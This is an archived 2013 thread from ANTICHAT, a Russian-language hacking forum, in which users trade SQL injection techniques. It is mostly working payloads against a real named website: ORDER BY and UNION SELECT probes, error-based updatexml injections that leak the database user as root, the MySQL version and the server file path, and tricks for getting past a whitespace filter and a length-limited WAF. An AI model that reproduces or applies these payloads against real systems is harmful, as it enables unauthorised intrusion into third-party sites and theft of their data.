ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.09.2013, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Сообщение от narviss
narviss said:
Можно ли что сделать с этой уязвимостью?
нет там ничего...
|
|
|
|
14.09.2013, 20:51
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от OxoTnik
OxoTnik said:
Да можно, blabla.com/news/
%Inject_Here%
2013
Сообщение от Br@!ns
Br@!ns said:
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
|
|
|
16.09.2013, 14:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
|
|
|
|
16.09.2013, 16:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
36927
Репутация:
5
|
|
Сообщение от Always
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Too many connections. Положили сканерами.
|
|
|
|
16.09.2013, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
7287
Репутация:
0
|
|
Запрос обрабатывается следующим скриптом:
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти? |
|
|
|
16.09.2013, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Always
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Сайт на базе CMS Drupal
Ищите готовые эксплоиты.
|
|
|
|
16.09.2013, 18:35
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от kilo_star
kilo_star said:
Запрос обрабатывается следующим скриптом:
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти? root'or(1)='1
|
|
|
|
16.09.2013, 19:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
7287
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
root'or(1)='1
спасибо Так а с применением /**/ можно как-то обойти?
|
|
|
|
17.09.2013, 06:55
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от kilo_star
kilo_star said:
спасибо
Так а с применением /**/ можно как-то обойти?
Рассмотрим данное регулярное выражение:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\s+/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]])) {
die([/COLOR][COLOR="#DD0000"]"ERROR NO SPACE"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
В строке производится поиск по символьному классу \s, то есть любых пробельных символов - пробел, TAB, etc... Строка, которая их не содержит или строка, длина которой больше pcre.backtrack_limit (в случае с массивом POST) фильтрацию проходит.
Использование /**/ возможно. Зависимости - mg=off поскольку sql-инъекция в кавычках.
|
|
|
|
17.09.2013, 09:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Always
Always said:
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
вырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.
Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):
Код:
Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1)%23
General error: 1105 XPATH syntax error: ' ::::::::root@localhost'
Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.
UDP1:
Код:
Code:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)%23
В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.
UDP2:
Еще варианты сжатия:
Код:
Code:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23
Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%23
UDP4:
Забыл про саму строку:
Код:
Code:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23
5.5.33-log
Путь очень длинный:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]local[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]apache22[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]grafomanam[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sites[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php
[/COLOR][/COLOR]
Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
